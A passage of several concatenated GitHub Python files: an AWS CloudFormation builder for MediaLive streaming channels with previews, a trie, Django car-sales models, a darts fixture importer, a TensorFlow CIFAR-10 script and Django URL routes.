super().__init__()\n self.description = description\n self.parent_channel_name = channel_name\n self.resolution = \"SD\"\n self.channel_template = channel_template\n self.flow_obj = flow_obj\n self.flow_name = flow_name\n self.media_live_client = boto3.client(\"medialive\")\n\n self.preview_mp_channel_id = preview_mp_channel_id\n self.preview_channel_id = preview_channel_id\n self.preview_origin_endpoint_id = preview_origin_endpoint_id\n self.preview_origin_id = preview_origin_id\n\n self.template = self.create_template()\n\n @property\n def channel_name(self):\n input_name = self.flow_name.replace(\"-\", \"\")\n return f\"{input_name}Preview\"\n\n def create_template(self):\n template = self.channel_template\n codec = \"AVC\"\n max_avc_bitrate = \"MAX_20_MBPS\"\n role_arn = f\"arn:aws:iam::{settings.AWS_ACCOUNT_NUMBER}:role/MediaLiveAccessRole\"\n\n preview_video_output = [\n output_defaults.output_preview,\n ]\n preview_video_descriptions = [\n video_defaults.video_description_preview,\n ]\n\n preview_audio_descriptions = [audio_defaults.audio_preview]\n\n mp_channel_preview = template.add_resource(\n # Create MediaPackage Channel\n mediapackage.Channel(\n self.channel_name,\n Id=self.preview_mp_channel_id,\n )\n )\n\n preview_media_live_input = template.add_resource(\n medialive.Input(\n f\"{self.channel_name}MediaLiveInput\",\n MediaConnectFlows=[\n medialive.MediaConnectFlowRequest(\n FlowArn=GetAtt(self.flow_obj, \"FlowArn\"),\n ),\n ],\n Name=f\"{self.channel_name}i\",\n RoleArn=role_arn,\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n Type=\"MEDIACONNECT\",\n DependsOn=[\n self.flow_obj,\n ],\n )\n )\n\n preview_input_attachment = medialive.InputAttachment(\n InputAttachmentName=Ref(preview_media_live_input),\n InputId=Ref(preview_media_live_input),\n InputSettings=medialive.InputSettings(\n DeblockFilter=\"DISABLED\",\n DenoiseFilter=\"DISABLED\",\n FilterStrength=1,\n InputFilter=\"AUTO\",\n Smpte2038DataPreference=\"IGNORE\",\n SourceEndBehavior=\"CONTINUE\",\n ),\n )\n\n channel_preview_destination = medialive.OutputDestination(\n Id=\"destinationPreview\",\n MediaPackageSettings=[\n medialive.MediaPackageOutputDestinationSettings(\n ChannelId=self.preview_channel_id,\n ),\n ],\n )\n\n mp_preview_endpoint = template.add_resource(\n # Create an origin endpoint that Cloudfront can use\n mediapackage.OriginEndpoint(\n f\"{self.flow_name}EndpointPreview\",\n Id=self.preview_origin_endpoint_id,\n ChannelId=self.preview_mp_channel_id,\n DependsOn=mp_channel_preview.title,\n HlsPackage=mediapackage.OriginEndpointHlsPackage(\n StreamSelection=StreamSelection(\n StreamOrder=\"VIDEO_BITRATE_DESCENDING\"\n )\n ),\n StartoverWindowSeconds=DISTRIBUTION_ORIGIN_ENDPOINT_STARTOVER_WINDOW,\n )\n )\n\n destination_preview = Select(2, Split(\"/\", GetAtt(mp_preview_endpoint, \"Url\")))\n\n mp_preview_distribution = template.add_resource(\n # Create Cloudfront Distribution\n cloudfront.Distribution(\n f\"{self.channel_name}Distribution\",\n DistributionConfig=cloudfront.DistributionConfig(\n Origins=[\n cloudfront.Origin(\n # Create new origin that Cloudfront can use\n Id=self.preview_origin_id,\n DomainName=destination_preview,\n CustomOriginConfig=cloudfront.CustomOriginConfig(OriginProtocolPolicy=\"match-viewer\"),\n ),\n ],\n DefaultCacheBehavior=cloudfront.DefaultCacheBehavior(\n TargetOriginId=self.preview_origin_id,\n ForwardedValues=cloudfront.ForwardedValues(QueryString=False),\n ViewerProtocolPolicy=\"allow-all\",\n ),\n Enabled=True,\n HttpVersion=\"http2\",\n ),\n Tags=[\n {\n \"Key\": \"Channel\",\n \"Value\": self.parent_channel_name,\n },\n {\n \"Key\": \"Input\",\n \"Value\": self.flow_name,\n },\n {\n \"Key\": \"mediapackage:cloudfront_assoc\",\n \"Value\": GetAtt(mp_channel_preview, \"Arn\"),\n },\n ],\n )\n )\n\n preview_output_group = medialive.OutputGroup(\n Name=f\"{self.resolution}_preview\",\n OutputGroupSettings=medialive.OutputGroupSettings(\n MediaPackageGroupSettings=medialive.MediaPackageGroupSettings(\n Destination=medialive.OutputLocationRef(DestinationRefId=\"destinationPreview\")\n )\n ),\n Outputs=preview_video_output,\n )\n\n preview_channel = template.add_resource(\n medialive.Channel(\n f\"{self.channel_name}mlc\",\n Name=f\"{self.channel_name}\",\n ChannelClass=\"SINGLE_PIPELINE\",\n Destinations=[channel_preview_destination],\n EncoderSettings=medialive.EncoderSettings(\n AudioDescriptions=preview_audio_descriptions,\n OutputGroups=[preview_output_group],\n VideoDescriptions=preview_video_descriptions,\n TimecodeConfig=medialive.TimecodeConfig(\n Source=\"SYSTEMCLOCK\",\n ),\n ),\n InputAttachments=[preview_input_attachment],\n InputSpecification=medialive.InputSpecification(\n Codec=codec,\n MaximumBitrate=max_avc_bitrate,\n Resolution=self.resolution,\n ),\n LogLevel=\"DISABLED\",\n RoleArn=role_arn,\n DependsOn=[\n mp_preview_distribution,\n ],\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.parent_channel_name,\n },\n )\n )\n\n template.add_output(\n [\n Output(f\"{self.flow_name}ChannelPreviewArn\", Value=GetAtt(preview_channel, \"Arn\")),\n Output(f\"{self.flow_name}DistributionPreviewUrl\", Value=GetAtt(mp_preview_endpoint, \"Url\")),\n ]\n )\n\n return template\n\n\nclass MediaLiveChannel(CloudFormationStackGeneric):\n \"\"\"\n Create a MediaLive Channel\n \"\"\"\n\n def __init__(\n self,\n description,\n channel_name,\n mp_channel_id,\n origin_endpoint_id,\n origin_id,\n preview_mp_channel_id,\n preview_channel_id,\n preview_origin_endpoint_id,\n preview_origin_id,\n resolution=\"HD\",\n ):\n super().__init__()\n self.description = description\n self.stack_name = channel_name\n self.resolution = resolution\n self.mp_channel_id = mp_channel_id\n self.origin_endpoint_id = origin_endpoint_id\n self.origin_id = origin_id\n\n self.preview_mp_channel_id = preview_mp_channel_id\n self.preview_channel_id = preview_channel_id\n self.preview_origin_endpoint_id = preview_origin_endpoint_id\n self.preview_origin_id = preview_origin_id\n\n self.media_live_client = boto3.client(\"medialive\")\n\n self.template = self.create_template()\n\n @property\n def channel_name(self):\n return self.stack_name.replace(\"-\", \"\")\n\n @property\n def is_uhd(self):\n if self.resolution not in [\"UHD\", \"HD\"]:\n raise ValueError(f\"{self.resolution} is not a valid resolution\")\n return self.resolution == \"UHD\"\n\n def create_template(self):\n template = Template()\n template.set_description(self.description)\n\n role_arn = f\"arn:aws:iam::{settings.AWS_ACCOUNT_NUMBER}:role/MediaLiveAccessRole\"\n codec = \"AVC\"\n max_bitrate = 200000000\n\n if self.is_uhd:\n max_avc_bitrate = \"MAX_50_MBPS\"\n else:\n max_avc_bitrate = \"MAX_20_MBPS\"\n\n ingest_port = 2000\n whitelist_cidr = \"0.0.0.0/0\"\n\n ms_container = template.add_resource(\n mediastore.Container(\n f\"MSC{self.channel_name}\",\n ContainerName=f\"MSC{self.channel_name}\",\n AccessLoggingEnabled=True,\n Tags=Tags(\n Key=\"Channel\",\n Value=self.channel_name,\n ),\n DeletionPolicy=\"Retain\",\n )\n )\n\n mp_channel = template.add_resource(\n # Create MediaPackage Channel\n mediapackage.Channel(\n self.channel_name,\n Id=self.mp_channel_id,\n )\n )\n\n mp_endpoint_1 = template.add_resource(\n # Create an origin endpoint that Cloudfront can use\n mediapackage.OriginEndpoint(\n f\"{self.channel_name}Endpoint1\",\n Id=self.origin_endpoint_id,\n ChannelId=self.mp_channel_id,\n DependsOn=mp_channel.title,\n HlsPackage=mediapackage.OriginEndpointHlsPackage(\n StreamSelection=StreamSelection(\n StreamOrder=\"VIDEO_BITRATE_DESCENDING\"\n ),\n ),\n StartoverWindowSeconds=DISTRIBUTION_ORIGIN_ENDPOINT_STARTOVER_WINDOW,\n )\n )\n\n destination1 = Select(2, Split(\"/\", GetAtt(mp_endpoint_1, \"Url\")))\n\n mp_distribution_1 = template.add_resource(\n # Create Cloudfront Distribution\n cloudfront.Distribution(\n f\"{self.channel_name}Distribution1\",\n DistributionConfig=cloudfront.DistributionConfig(\n Origins=[\n cloudfront.Origin(\n # Create new origin that Cloudfront can use\n Id=self.origin_id,\n DomainName=destination1,\n CustomOriginConfig=cloudfront.CustomOriginConfig(OriginProtocolPolicy=\"match-viewer\"),\n ),\n ],\n DefaultCacheBehavior=cloudfront.DefaultCacheBehavior(\n TargetOriginId=self.origin_id,\n ForwardedValues=cloudfront.ForwardedValues(QueryString=False),\n ViewerProtocolPolicy=\"allow-all\",\n ),\n Enabled=True,\n HttpVersion=\"http2\",\n ),\n Tags=[\n {\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n {\n \"Key\": \"mediapackage:cloudfront_assoc\",\n \"Value\": GetAtt(mp_channel, \"Arn\"),\n },\n ],\n )\n )\n\n ec2_vpc_1 = template.add_resource(\n ec2.VPC(\n f\"{self.channel_name}vpc\",\n CidrBlock=\"10.1.2.0/24\",\n EnableDnsSupport=True,\n EnableDnsHostnames=False,\n InstanceTenancy=\"default\",\n Tags=[\n {\n \"Key\": \"Name\",\n \"Value\": f\"{self.channel_name}vpc\",\n },\n {\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n ],\n )\n )\n\n ec2_vpc_1_subnet_a = template.add_resource(\n ec2.Subnet(\n f\"{self.channel_name}subneta\",\n AvailabilityZone=\"us-east-1a\",\n CidrBlock=\"10.1.2.0/28\",\n VpcId=Ref(ec2_vpc_1),\n MapPublicIpOnLaunch=False,\n Tags=[\n {\n \"Key\": \"Name\",\n \"Value\": f\"{self.channel_name}a\",\n },\n {\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n ],\n )\n )\n\n media_connect_flow_1 = template.add_resource(\n mediaconnect.Flow(\n f\"{self.channel_name}flow1\",\n Name=f\"{self.channel_name}flow1\",\n Source=mediaconnect.Source(\n Name=f\"{self.channel_name}flow1s\",\n Description=f\"{self.channel_name}flow1s\",\n IngestPort=ingest_port,\n MaxBitrate=max_bitrate,\n WhitelistCidr=whitelist_cidr,\n Protocol=\"srt-listener\",\n ),\n AvailabilityZone=GetAtt(ec2_vpc_1_subnet_a, \"AvailabilityZone\"),\n )\n )\n\n media_live_input = template.add_resource(\n medialive.Input(\n f\"{self.channel_name}MediaLiveInput\",\n MediaConnectFlows=[\n medialive.MediaConnectFlowRequest(\n FlowArn=GetAtt(media_connect_flow_1, \"FlowArn\"),\n ),\n ],\n Name=f\"{self.channel_name}i\",\n RoleArn=role_arn,\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n Type=\"MEDIACONNECT\",\n DependsOn=[\n media_connect_flow_1,\n ],\n )\n )\n\n audio_descriptions = [\n audio_defaults.audio_1,\n audio_defaults.audio_2,\n audio_defaults.audio_3,\n audio_defaults.audio_4,\n audio_defaults.audio_2eac3,\n ]\n output_list = [\n output_defaults.output1080p,\n output_defaults.output720p,\n output_defaults.output480p,\n output_defaults.output240p,\n ]\n mediastore_output_list = [output_defaults.mediastore_output1080p]\n\n video_descriptions = [\n video_defaults.video_description_1080p,\n video_defaults.video_description_720p,\n video_defaults.video_description_480p,\n video_defaults.video_description_240p,\n ]\n mediastore_descriptions = [video_defaults.mediastore_video_description_1080p]\n\n if self.is_uhd:\n # Append the audio_2eac3 settings\n audio_descriptions += [audio_defaults.audio_1eac3]\n\n # prepend 2160p to the outputs/descriptions\n output_list = [output_defaults.output2160p] + output_list\n mediastore_output_list = [output_defaults.mediastore_output2160p] + mediastore_output_list\n mediastore_descriptions = [video_defaults.mediastore_video_description_2160p] + mediastore_descriptions\n video_descriptions = [video_defaults.video_description_2160p] + video_descriptions\n\n channel_destination = medialive.OutputDestination(\n Id=\"destination1\",\n MediaPackageSettings=[\n medialive.MediaPackageOutputDestinationSettings(\n ChannelId=self.mp_channel_id,\n ),\n ],\n )\n\n mediastore_destination = medialive.OutputDestination(\n Id=\"mediaStoredestination1\",\n Settings=[\n medialive.OutputDestinationSettings(\n Url=Sub(\n \"mediastoressl://${EndpointSansProtocol}/out/index\",\n {\n \"EndpointSansProtocol\": Select(\n 1,\n Split(\"://\", GetAtt(ms_container, \"Endpoint\")),\n ),\n },\n ),\n ),\n ],\n )\n\n ms_output_group = medialive.OutputGroup(\n Name=\"MediaStore\",\n OutputGroupSettings=medialive.OutputGroupSettings(\n HlsGroupSettings=medialive.HlsGroupSettings(\n HlsCdnSettings=medialive.HlsCdnSettings(\n HlsMediaStoreSettings=medialive.HlsMediaStoreSettings(\n MediaStoreStorageClass=\"TEMPORAL\",\n NumRetries=10,\n ConnectionRetryInterval=1,\n RestartDelay=15,\n FilecacheDuration=300,\n ),\n ),\n InputLossAction=\"EMIT_OUTPUT\",\n Mode=\"LIVE\",\n Destination=medialive.OutputLocationRef(DestinationRefId=\"mediaStoredestination1\"),\n )\n ),\n Outputs=mediastore_output_list,\n )\n\n output_group = medialive.OutputGroup(\n Name=self.resolution,\n OutputGroupSettings=medialive.OutputGroupSettings(\n MediaPackageGroupSettings=medialive.MediaPackageGroupSettings(\n Destination=medialive.OutputLocationRef(DestinationRefId=\"destination1\")\n )\n ),\n Outputs=output_list,\n )\n\n input_attachment = medialive.InputAttachment(\n InputAttachmentName=Ref(media_live_input),\n InputId=Ref(media_live_input),\n InputSettings=medialive.InputSettings(\n DeblockFilter=\"DISABLED\",\n DenoiseFilter=\"DISABLED\",\n FilterStrength=1,\n InputFilter=\"AUTO\",\n Smpte2038DataPreference=\"IGNORE\",\n SourceEndBehavior=\"CONTINUE\",\n ),\n )\n\n media_live_channel = template.add_resource(\n medialive.Channel(\n f\"{self.channel_name}MediaLiveChannel\",\n Name=f\"{self.channel_name}\",\n ChannelClass=\"SINGLE_PIPELINE\",\n Destinations=[channel_destination, mediastore_destination],\n EncoderSettings=medialive.EncoderSettings(\n AudioDescriptions=audio_descriptions,\n OutputGroups=[output_group, ms_output_group],\n VideoDescriptions=video_descriptions + mediastore_descriptions,\n TimecodeConfig=medialive.TimecodeConfig(\n Source=\"SYSTEMCLOCK\",\n ),\n ),\n InputAttachments=[input_attachment],\n InputSpecification=medialive.InputSpecification(\n Codec=codec,\n MaximumBitrate=max_avc_bitrate,\n Resolution=self.resolution,\n ),\n LogLevel=\"DISABLED\",\n RoleArn=role_arn,\n DependsOn=[\n mp_distribution_1,\n ],\n Tags={\n \"Key\": \"Channel\",\n \"Value\": self.channel_name,\n },\n )\n )\n\n \"\"\"\n Add Media Package PackagingGroup\n It's needed for creating asset for clipped VOD playback\n \"\"\"\n packaging_group = template.add_resource(\n mediapackage.PackagingGroup(\n Id=f\"MediaPackagePackagingGroup{self.channel_name}\", title=\"MediaPackageDefaultPackagingGroup\"\n )\n )\n\n \"\"\"\n Add Media Package PackagingConfiguration\n It's needed for creating asset for clipped VOD playback\n \"\"\"\n packaging_configuration = template.add_resource(\n mediapackage.PackagingConfiguration(\n Id=f\"MediaPackagePackagingConfiguration{self.channel_name}\",\n title=\"MediaPackageDefaultPackagingConfiguration\",\n PackagingGroupId=Select(1, Split(\"/\", GetAtt(packaging_group, \"Arn\"))),\n # PackagingGroupId=GetAtt(packaging_group, \"Arn\"),\n HlsPackage=mediapackage.HlsPackage(HlsManifests=[mediapackage.HlsManifest()]),\n )\n )\n \"\"\"\n Create dashboard\n \"\"\"\n channel_id = Select(8, Split(\":\", GetAtt(media_live_channel, \"Arn\")))\n\n cw_dashboard = template.add_resource(\n cloudwatch.Dashboard(\n \"CloudWatchDashboard2\",\n DashboardName=f\"Playout_{self.channel_name}\",\n DashboardBody=get_dashboard_body(\n channel_name=self.channel_name,\n channel_id=channel_id,\n region=settings.AWS_DEFAULT_REGION,\n mediapackage_channel_uuid=self.mp_channel_id,\n channel_hls_url=GetAtt(mp_endpoint_1, \"Url\"),\n ),\n )\n )\n\n distribution_url = Join(\n \"/\",\n [\n GetAtt(mp_distribution_1, \"DomainName\"),\n Select(2, Split(\"/\", GetAtt(mp_endpoint_1, \"Url\"))),\n ],\n )\n\n template.add_output(\n [\n Output(\"ChannelArn\", Value=GetAtt(media_live_channel, \"Arn\")),\n Output(\"FlowArn\", Value=GetAtt(media_connect_flow_1, \"FlowArn\")),\n Output(\"SRTIP\", Value=GetAtt(media_connect_flow_1, \"Source.IngestIp\")),\n Output(\"SRTPort\", Value=GetAtt(media_connect_flow_1, \"Source.SourceIngestPort\")),\n Output(\"DistributionDomainName\", Value=GetAtt(mp_distribution_1, \"DomainName\")),\n Output(\"DistributionUrl\", Value=distribution_url),\n Output(\"MediapackageUrl\", Value=GetAtt(mp_endpoint_1, \"Url\")),\n Output(\"DashboardId\", Value=Ref(cw_dashboard)),\n Output(\n \"FlowSourceInput\",\n Value=Join(\n \"\",\n [\n \"srt://\",\n GetAtt(media_connect_flow_1, \"Source.IngestIp\"),\n \":\",\n GetAtt(media_connect_flow_1, \"Source.SourceIngestPort\"),\n ],\n ),\n ),\n Output(\n \"MediaLiveInitialInputArn\",\n Value=GetAtt(media_live_input, \"Arn\"),\n ),\n Output(\"MediaPackagePackagingGroupArn\", Value=GetAtt(packaging_group, \"Arn\")),\n Output(\"MediaPackagePackagingConfigurationArn\", Value=GetAtt(packaging_configuration, \"Arn\")),\n ]\n )\n\n # ################\n # Add preview output to the template\n template = PreviewChannel(\n self.description,\n self.channel_name,\n template,\n f\"{self.channel_name}flow1\",\n media_connect_flow_1,\n self.preview_mp_channel_id,\n self.preview_channel_id,\n self.preview_origin_endpoint_id,\n self.preview_origin_id,\n ).template\n\n return template\n\n def start(self):\n client = self.get_boto_client(\"medialive\")\n client.start_channel(ChannelId=self.get_channel_id())\n\n def stop(self):\n try:\n channel_id = self.get_channel_id()\n except ClientError as ex:\n if \"does not exist\" in ex.response[\"Error\"][\"Message\"]:\n return\n raise ex\n except Exception as ex:\n logger.error(f\"Error with channel {ex}\")\n raise ex\n\n client = self.get_boto_client(\"medialive\")\n client.stop_channel(ChannelId=channel_id)\n\n def get_channel_id(self):\n return self.get_output_value(\"ChannelArn\").split(\":\")[-1]\n\n def get_flow_arn(self):\n return self.get_output_value(\"FlowArn\")\n\n def get_srt_uri(self):\n return self.get_output_value(\"FlowSourceInput\")\n\n def get_srt_ip(self):\n return self.get_output_value(\"SRTIP\")\n\n def get_distribution_uri(self):\n return self.get_output_value(\"DistributionUrl\")\n","repo_name":"starforce86/veeps_elemental","sub_path":"apps/veepsapi/apps/api/cloudformation/channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":25847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74139282927","text":"class TrieNode:\n def __init__(self):\n self.is_word = False\n self.children = {} \n\n def __str__(self):\n return f\"{self.children} / {self.is_word}\"\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def add(self, word):\n current_node = self.root\n\n for index, char in enumerate(word): \n if char in current_node.children:\n current_node = current_node.children[char]\n else:\n new_node = TrieNode() \n current_node.children[char] = new_node\n current_node = new_node\n \n current_node.is_word = True\n\n def exists(self, word):\n temp = self.root\n\n for char in word:\n if char in temp.children:\n temp = temp.children[char]\n else:\n break\n\n return temp.is_word\n\ntrie = Trie()\ntrie.add('Testing')\ntrie.add('Test')\ntrie.add('Another')\nprint(trie.exists('Testing'))\nprint(trie.exists('Test'))\nprint(trie.exists('Another'))","repo_name":"gurleensethi/udacity-data-structure-algorithms-nanodegree","sub_path":"7. Basic Algorithms/tries.py","file_name":"tries.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33900919060","text":"from django.db import models\nfrom django.urls import reverse\n\n# Create your models here.\n\nclass AutomobileVO(models.Model):\n color = models.CharField(max_length=50)\n year = models.PositiveSmallIntegerField()\n vin = models.CharField(max_length=17, unique=True)\n\n\nclass SalesPerson(models.Model):\n name = models.CharField(max_length=100)\n employee_number = models.PositiveIntegerField()\n\n def get_api_url(self):\n return reverse(\"api_sales_person\", kwargs={\"pk\": self.id})\n\nclass PotentialCustomer(models.Model):\n name = models.CharField(max_length=100)\n address = models.CharField(max_length=200)\n phone_number = models.PositiveBigIntegerField()\n\nclass SaleRecord(models.Model):\n automobile = models.ForeignKey(\n AutomobileVO,\n related_name=\"automobile\",\n on_delete=models.PROTECT)\n sales_person = models.ForeignKey(\n SalesPerson,\n related_name=\"sales_person\",\n on_delete=models.PROTECT)\n customer = models.ForeignKey(\n PotentialCustomer,\n related_name=\"customer\",\n on_delete=models.PROTECT)\n price = models.PositiveIntegerField()\n\nclass SalesList(models.Model):\n sales_person = models.ForeignKey(\n SalesPerson,\n related_name=\"sales_list_sales_person\",\n on_delete=models.PROTECT)\n customer = models.ForeignKey(\n PotentialCustomer,\n related_name=\"sales_list_customer\",\n on_delete=models.PROTECT)\n vin = models.ForeignKey(\n AutomobileVO,\n related_name=\"sales_list_vin\",\n on_delete=models.PROTECT)\n price = models.ForeignKey(\n SaleRecord,\n related_name=\"sales_price\",\n on_delete=models.PROTECT)\n\nclass EmployeeSalesList(models.Model):\n sales_person = models.ForeignKey(\n SalesPerson,\n related_name=\"employee_sales_list_sales_person\",\n on_delete=models.PROTECT)\n customer = models.ForeignKey(\n PotentialCustomer,\n related_name=\"employee_sales_list_customer\",\n on_delete=models.PROTECT)\n vin = models.ForeignKey(\n AutomobileVO,\n related_name=\"employee_sales_list_vin\",\n on_delete=models.PROTECT)\n price = models.ForeignKey(\n SaleRecord,\n related_name=\"employee_sales_price\",\n on_delete=models.PROTECT)\n","repo_name":"StevenHuyTran/car-car","sub_path":"sales/api/sales_rest/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22015487620","text":"from derby_darts.models import Fixture\n\n__author__ = 'Michael.Saysell'\nimport csv\nfrom datetime import datetime\n\n\nclass CSVImporter(object):\n def __init__(self, file_name):\n self.file_name = file_name\n\n def read_file(self):\n return csv.reader(self.file_name)\n\n def load_file(self):\n with open(self.file_name, 'rb') as csv_file:\n contents = csv.reader(csv_file)\n\n if not contents:\n return False\n\n date_strings = next(contents)\n dates = [datetime.strptime(date_string, '%d/%m/%Y') for date_string in date_strings]\n\n section_one = ['Alv/Crewton', 'OMS A', 'Sinfin Moor', 'Coach and Horses', 'Brunswick',\n 'Duke of Clarence B', 'Courtyard B', 'Chad Lace', 'Station Inn', 'York Tavern']\n\n section_two = ['Woodlark', 'Courtyard A', 'Navigation', 'Spa Inn', '102 Club',\n 'Littleover Social', 'OMS B', 'Furnace', 'Norman Arms']\n\n section_three = ['Duke of Clarence A', 'Dunkirk', 'Junction Tav', 'Golden Eagle', '105 Club',\n 'Alexandra', 'Seven Stars', 'Clarion Club', 'The Mile', 'BYE']\n\n for row_idx, row in enumerate([x for x in contents]):\n for idx, fixture in enumerate(row):\n if 'H' in fixture:\n print('{}: {} v {}'.format(dates[idx],\n section_three[row_idx],\n section_three[int(fixture[:-1]) - 1]))\n\n def load_file_for_season(self, teams, season):\n\n with open(self.file_name, 'rb') as csv_file:\n contents = csv.reader(csv_file)\n\n if not contents:\n return False\n\n date_strings = next(contents)\n dates = [datetime.strptime(date_string, '%d/%m/%Y') for date_string in date_strings]\n\n fixture_rows = [x for x in contents]\n\n for row_idx, row in enumerate(fixture_rows):\n for idx, fixture in enumerate(row):\n if 'H' in fixture:\n fixture, created = Fixture.objects.get_or_create(season=season,\n date=dates[idx],\n home_team=teams[row_idx],\n away_team=teams[int(fixture[:-1]) - 1])\n fixture.save()\n","repo_name":"msaysell/chao","sub_path":"Fixtures/csv_importer.py","file_name":"csv_importer.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"30160751127","text":"import __future__\n\nimport tensorflow as tf\nimport numpy as np\n\nfrom models.configuration import Config\nfrom cs231n.data_utils import load_CIFAR10\nfrom models.CNN import basic_model, transfer_learning_model\nimport matplotlib.pyplot as plt\n\n\n# Get the data\ndef get_CIFAR10_data(num_training=49000, num_validation=1000, num_test=10000):\n \"\"\"\n Load the CIFAR-10 dataset from disk and perform preprocessing to prepare\n it for the two-layer neural net classifier. These are the same steps as\n we used for the SVM, but condensed to a single function. \n \"\"\"\n # Load the raw CIFAR-10 data\n cifar10_dir = 'cs231n/datasets/cifar-10-batches-py'\n X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)\n\n # Subsample the data\n mask = range(num_training, num_training + num_validation)\n X_val = X_train[mask]\n y_val = y_train[mask]\n mask = range(num_training)\n X_train = X_train[mask]\n y_train = y_train[mask]\n mask = range(num_test)\n X_test = X_test[mask]\n y_test = y_test[mask]\n\n # Normalize the data: subtract the mean image\n mean_image = np.mean(X_train, axis=0)\n X_train -= mean_image\n X_val -= mean_image\n X_test -= mean_image\n\n return X_train, y_train, X_val, y_val, X_test, y_test\n\n\n# Invoke the above function to get our data.\n# X_train, y_train, X_val, y_val, X_test, y_test = get_CIFAR10_data(num_training=1000,num_validation=10, num_test=10)\nX_train, y_train, X_val, y_val, X_test, y_test = get_CIFAR10_data()\n# print('Train data shape: ', X_train.shape)\n# print('Train labels shape: ', y_train.shape)\n# print('Validation data shape: ', X_val.shape)\n# print('Validation labels shape: ', y_val.shape)\n# print('Test data shape: ', X_test.shape)\n# print('Test labels shape: ', y_test.shape)\n\n\n\"\"\"\ntraining\n\"\"\"\n# models = []\n# for i in range(1):\n# config = Config('config_files/reg_tuning/test.json')\n# model_folder = 'trained_models/basic_model/tuning_reg/'\n# filename = 'test{0:s}.ckpt'.format(str(i))\n\n# models.append(basic_model(config, model_folder, filename))\n \n# model_path = models[i].train(\n# \tX_train, y_train, \n# \tX_val, y_val, \n# \t)\n\n# config = Config('config.json')\n# model_folder = 'trained_models/basic_model'\n# filename = 'test.ckpt'\n\n# model = basic_model(config, model_folder, filename)\n\n# model_path = model.train(\n# X_train, y_train, \n# X_val, y_val, \n# )\n\n# for i in range(2):\n# acc = models[i].evaluate(X_val, y_val)\n# print(acc)\n\n# pred = models[i].predict(X_val)\n# print(pred)\n\n\n\n\"\"\"\n1 data augmentation\n2 grid search, random search, oscar\n3. transfer learning\n4. cpu, gpu, multithread, graph\n\"\"\"\n\n\"\"\"\ntransfer learning\n\"\"\"\n# config = Config('config_files/transfer_learning/test.json')\n# model_folder = 'trained_models/transfer_learning_model/transfer_learning/'\n# filename = 'test.ckpt'\n# model = transfer_learning_model(config, model_folder, filename)\n\n# # run the model to train\n# model_path = model.train(\n# data=X_train, labels=y_train, \n# val_data=X_val, val_labels=y_val, \n# original_model_path=\"trained_models/basic_model/tuning_reg/test0.ckpt\",\n# reuse_var_scope=\"Conv_Layers\",\n# train_var_scope=\"Fully_connected\"\n# )\n\n# oldGraph = tf.Graph()\n# saver = tf.train.Saver()\nwith tf.Session() as sess:\n saver = tf.train.import_meta_graph(\"trained_models/basic_model/tuning_reg/test0.ckpt.meta\")\n saver.restore(sess, \"trained_models/basic_model/tuning_reg/test0.ckpt\")\n\n # graph = tf.get_default_graph()\n # print(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=\"Conv_Layers\"))\n kernel = tf.global_variables(\"Conv_Layers/conv_layer0/conv0/kernel:0\")[0].eval()\n\ntf.reset_default_graph()\nwith tf.Session() as sess:\n saver = tf.train.import_meta_graph(\"trained_models/transfer_learning_model/transfer_learning/test.ckpt.meta\")\n saver.restore(sess, \"trained_models/transfer_learning_model/transfer_learning/test.ckpt\")\n\n # graph = tf.get_default_graph()\n # print(tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=\"Conv_Layers\"))\n kernel1 = tf.global_variables(\"Conv_Layers/conv_layer0/conv0/kernel:0\")[0].eval()\n\n# with tf.Session() as sess:\nprint(kernel1 == kernel)","repo_name":"StranotDong/CNN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11820944359","text":"from evaluacion.views import EvaluacionDeleteView, EvaluacionDetailsView, EvaluacionEditView, EvaluacionListView, EvaluacionCreateView, PuntajeEvCreateView, PuntajeEvEditView, PuntajesEvListView, deletePuntajeEv, updatePuntaje, usuariosEvaluacionAPI\nfrom django.urls import path\n\napp_name=\"evaluacion\"\n\nurlpatterns= [\n\n #EVALUACION\n path('evaluacion/', EvaluacionListView.as_view(), name=\"evaluaciones\"),\n path('evaluacion/crear/', EvaluacionCreateView.as_view(), name=\"crear_evaluacion\"),\n path('evaluacion/details//', EvaluacionDetailsView.as_view(), name=\"evaluacion_details\"),\n path('evaluacion/eliminar//', EvaluacionDeleteView.as_view(), name=\"evaluacion_delete\"),\n path('evaluacion/editar//', EvaluacionEditView.as_view(), name=\"evaluacion_edit\"),\n path('evaluacionPuntajesAPI//', usuariosEvaluacionAPI),\n path('updatePuntajeEv/', updatePuntaje),\n\n #Puntajes para cada tipo de actividad\n path('configuracion/puntajes-evaluacion/', PuntajesEvListView.as_view(), name=\"evaluacion_puntajes\"),\n path('configuracion/puntajes-evaluacion/crear/', PuntajeEvCreateView.as_view(), name=\"crear_puntaje_evaluacion\"),\n path('configuracion/puntajes-evaluacion/editar//', PuntajeEvEditView.as_view(), name=\"editar_puntaje_evaluacion\"),\n path('configuracion/puntajes-evaluacion/eliminar//', deletePuntajeEv, name=\"delete_puntaje_evaluacion\"),\n]","repo_name":"rody2312/Proyecto-Python","sub_path":"evaluacion/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25063472735","text":"import numpy as 